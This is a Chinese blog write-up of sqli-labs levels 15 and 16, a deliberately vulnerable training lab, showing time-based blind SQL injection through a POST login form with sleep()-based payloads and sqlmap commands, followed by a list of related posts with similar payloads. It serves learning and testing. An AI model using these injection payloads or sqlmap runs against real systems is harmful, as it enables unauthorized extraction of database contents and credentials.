sqli-labs-master第15、16关

最新推荐文章于 2024-05-06 15:38:01 发布
最新推荐文章于 2024-05-06 15:38:01 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/106103048
版权

前言:在第九关我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。
第15关
http://192.168.89.134/sqli-labs-master/Less-15/
在这里插入图片描述
我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注
我们看下源代码:
在这里插入图片描述
猜想正确
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。)
admin’ and if(length(database()=8),sleep(5),1) #
这句话意思就是 如果条件成立,就停止5秒
在这里插入图片描述
看这延迟5秒中,说明猜想数据库8位正确
我们继续猜解库名
admin’ and if(substr(database(),1,1)=‘s’,sleep(5),1)–+
admin’ and if(substr(database(),2,1)=‘e’,sleep(5),1)–+
admin’ and if(substr(database(),3,1)=‘c’,sleep(5),1)–+
admin’ and if(substr(database(),4,1)=‘u’,sleep(5),1)–+
admin’ and if(substr(database(),5,1)=‘r’,sleep(5),1)–+
admin’ and if(substr(database(),6,1)=‘i’,sleep(5),1)–+
admin’ and if(substr(database(),7,1)=‘t’,sleep(5),1)–+
admin’ and if(substr(database(),8,1)=‘y’,sleep(5),1)–+
像这样继续猜解不断尝试
如果想进一步得到用户、密码信息,继续不断猜解…
反正盲注很麻烦并且浪费时间!

第十六关
把admin’换成admin’’)其他的步骤都一样

我们用sqlmap去验证
在这里有一点需要和大家强调的
我们用昨天的命令:
sqlmap -r 15.txt
在这里插入图片描述
说没扫描出来,我查阅了一些资料sqlmap默认的注入能力是level=1,我们改成3
sqlmap -r 15.txt --level=3
在这里插入图片描述
提示我们有基于时间的盲注还有版本信息
接下来都一样,我省略一些步骤,直接看结果
在这里插入图片描述
这次真的好慢,可能是因为我们级别调成3

总结:经过了POST方式盲注基本和GET方式相同,换汤不换药。

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

m__ing
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs第十五和十六(post请求-布尔盲注)
qq_42266432的博客
08-26 855
开启第十五,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs-master第八
FourthGuy的博客
10-09 1620
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sqli-labs靶场15-19过笔记
weixin_62884797的博客
04-16 718
15 我们按照老办法,输入单引号查看回显信息,但没有到没有,显然,他极有可能是无回显报错,那就是盲注了。 先bp抓包 发现他是post的请求,我们就在bp中改包注入一下 admin' and 1=1 23% 发现登陆成功,确实有注入点,但是无回显,我们就需要盲注了。 uname=admin' and sleep(5) 23%&passwd=admin&submit=Submit 在bp中,我们等了一会儿他回显的,我们可以确定,可以使用时间盲注了。 uname=adm
SQLI-labs-第十五和第十六
最新发布
weixin_54055099的博客
05-06 891
Sqlilab第十五和十六,时间盲注
sql-lab靶场原理详解(1-22)
cz020907020808的博客
06-01 1082
id=1 'and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) – qwe 延时,说明数据库的第一个的第一位是e。id=1 'and if ((ascii(substr(database(),1,1))=115),sleep(5),1) --qwe 延时,说明数据库第一位是s。
sqli-labs靶场15-19笔记中总结
weixin_45585955的博客
04-16 3818
第十五属于时间注入,基于源码分析,闭合字符是单引号。 本没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。 那这里对 id 进行 ‘ id’ 的处理。 本我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录,不正确的时候这里会延时 5 秒。 第十六
SQLI-LABS靶场11-20
qq_45314073的博客
10-16 3024
声明:所有文章仅供学习使用,且其中有些是在网上找的资料,或许有相同的,如若侵权,请联系删除 LESS11(POST注入): 判断是否动态网站 两种判断法: 第一种是从网页的后缀名判断,一般html、htm结尾的网页为通常所说的静态页面; 其他的诸如php,jsp,asp等等为通常所说的动态页面(PS:需要要注意的是,如果网站页面是由伪静态生成的,那就不一定了。比如wordpress、dede伪静态后的页面也可以是html的,伪静态其实也算静态。) 第二种就是通过url(网址)来判断 ,
sqli-labs 靶场(11-22)
知世郎
10-16 233
前十使用的是get请求,参数都体现在url上面,而从十一开始是post请求,参数是在表单里面。1' ,2, (extractvalue(1,concat(0x5c,(select group_concat(password,username) from users),0x5c)))# 爆账户密码。1',2,updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# 爆账户密码。
sqli-labs第十五
yuqnqi的博客
05-09 868
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
sqli-labs 第十一
weixin_67813445的博客
02-16 280
第11出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqlilabs-15
KAKA的博客
07-07 837
这一来到了第 15 ,值得注意的是,这一是布尔和时间盲注的结合,很好玩哦~ 因为有时间盲注,这里就直接上菜了,下面是几个例子 –查表 uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查列 uname=admin' a
sqli-labs的第15的布尔脚本(附代码分析)
skoyine的博客
05-02 1463
sqli-labs的第15布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
sqli-labs15(基于post提交的单引号布尔盲注)通思路
zyh1588的博客
11-11 833
小白回顾sql靶场15
sqli-labs靶场第十五
gou1791241251的博客
12-27 949
第十五没什么特殊的,只是单引号闭合而已。
sqli-labs第15——基于post型的时间盲注,使用sqlmap工具
m0_73752956的博客
08-29 420
属于时间注入,基于源码分析,闭合字符是单引号。由于过程较复杂,这里使用sqlmap跑数据。这样我们就跑完了所有数据。
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为“sqli-labs”的数据库,并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。 5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php,这将创建所需的数据库表和数据。 6. 访问http://localhost/sqli-labs-master/index.html,您将看到sqli-labs的主页。 7. 点击“Lessons”链接,您将看到一系列的SQL注入漏洞测试用例,您可以选择其中的一个进行测试。 8. 在测试用例页面中,您可以看到注入点和注入语句,您可以使用工具如SQLMap等进行注入测试。 希望这个安装教程对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值